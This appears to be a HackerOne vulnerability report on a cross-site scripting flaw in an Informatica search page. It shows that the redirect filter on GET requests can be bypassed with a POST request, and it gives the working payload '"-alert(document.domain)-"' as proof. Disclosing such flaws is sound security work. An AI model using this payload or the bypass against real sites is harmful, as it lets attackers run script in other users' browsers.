Informatica: [] Search XSS

ID H1:200034
Type hackerone
Reporter s_p_q_r
Modified 2017-05-22T04:08:23


The search query parameter is put into Javascript to set the localStorage item:

javascript localStorage.setItem("searchTerm", "%foo%");

Attempts to inject XSS payloads are blocked by redirection that removes special chars from the URL:

```http GET /search-solr.jspa?q=aaa%22bbb%27ccc%3Cddd%3Eeee HTTP/1.1 Host:

HTTP/1.0 302 Found Location: ```

However it turns out the search param can be successfully submitted via POST — the following request popups an alert:

```http POST /search-solr.jspa HTTP/1.1 Host:

q=%22-alert%28document.domain%29-%22 ```


Tested with latest Firefox and Chrome.